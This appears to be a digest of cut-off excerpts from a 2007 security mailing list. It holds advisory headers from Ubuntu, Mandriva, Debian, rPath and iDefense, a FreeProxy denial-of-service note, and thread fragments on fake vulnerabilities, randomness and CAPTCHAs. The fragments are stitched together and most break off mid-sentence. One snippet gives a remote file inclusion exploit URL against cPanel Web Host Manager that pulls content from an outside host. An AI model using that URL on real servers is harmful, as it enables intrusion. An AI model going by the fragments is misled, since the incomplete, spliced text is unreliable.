On Mon, 29 Jan 2007, Simple Nomad wrote:
On Mon, 2007-01-29 at 13:00 -0600, Gadi Evron wrote:
How can we all automate the testing process for fake vulns in and list them as such without overburdening OSVDB, CVE, Milworm and SecuriTeam?
How about letting them get posted to bugtraq as ppl
===
Ubuntu Security Notice USN-417-2 February 06, 2007
postgresql-8.1 regression
https://launchpad.net/bugs/83505
===
A security issue affects the following Ubuntu releases:
The FreeProxy HTTP proxy server suffers from a denial of service condition
which causes the server to hang. This occurs when an attacker makes a
request for the hostname/portnumber combination in use by the server itself.
The vendor was notified on the 10th January 2007 and a fix was made
Mandriva Linux Security Advisory MDKSA-2007:035
http://www.mandriva.com/security/
Mandriva Linux Security Advisory MDKSA-2007:036
http://www.mandriva.com/security/
Mandriva Linux Security Advisory MDKSA-2007:037
http://www.mandriva.com/security/
Mandriva Linux Security Advisory MDKSA-2007:038
http://www.mandriva.com/security/
Debian Security Advisory DSA 1258-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
February 7th, 2007
rPath Security Advisory: 2007-0026-1
Published: 2007-02-07
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Local Deterministic Denial of Service
Updated Versions:
samba=/[EMAIL PROTECTED]:devel//1/3.0.24-0.1-1
samba-swat=/[EMAIL PROTECTED]:devel//1/3.0.24-0.1-1
$
$
$ Title : XLNC1 Radio Classical Music Nuke Portal Remote File Inc. Vuln.
$ Author: Gokhan
$ Site : http://www.xlnc1.org/nuke
$ Contact : [EMAIL PROTECTED] | [EMAIL PROTECTED]
$
$ Vuln
I'm somewhat surprised that the reporter does not list the HTML template editor
as a potential XSS attack vector too. Perhaps he considers uploading files via
FTP to be a means of attack too?
Yes, we allow *authenticated administrators* to enter HTML for certain values.
This is the intended
Amit Klein wrote:
Chris Anley wrote:
Hi folks,
I've posted a paper that explains a little more here:
http://www.ngssoftware.com/research/papers/Randomness.pdf
Nice paper. I do notice an enumeration loop over 2^16 possible 16-bit
values. This can be improved as follows (note: this is
Mandriva Linux Security Advisory MDKSA-2007:039
http://www.mandriva.com/security/
RARLabs Unrar Password Prompt Buffer Overflow Vulnerability
iDefense Security Advisory 02.07.07
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 07, 2007
I. BACKGROUND
Unrar is a command line archive extractor for Windows and Linux. For more
information visit the vendor's site at the
Trend Micro TmComm Local Privilege Escalation Vulnerability
iDefense Security Advisory 02.07.07
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 07, 2007
I. BACKGROUND
The Trend Micro AntiVirus scan engine is widely relied upon to provide
AntiVirus capabilities to desktop, server, and
Trend Micro AntiVirus UPX Parsing Kernel Buffer Overflow Vulnerability
iDefense Security Advisory 02.07.07
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 07, 2007
I. BACKGROUND
The Trend Micro AntiVirus scan engine provides anti-virus capabilities to
desktop, server and gateway
name : web host manager
vendor : cpanel.net
by : s3rv3r_hack3r (ali [at] hackerz [dot] ir)
web-site : www.hackerz.ir - ali.hackerz.ir
exploit:
http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?
On Thursday 01 February 2007 01:52, Andreas Beck wrote:
No, but it can be easily defeated by changing the placement/appearance
of the number(s) as well as that of the noise or by keeping both
constant over reloads.
What is exploited here, is the fact that noise and payload behave
differently
Mandriva Linux Security Advisory MDKSA-2007:040
http://www.mandriva.com/security/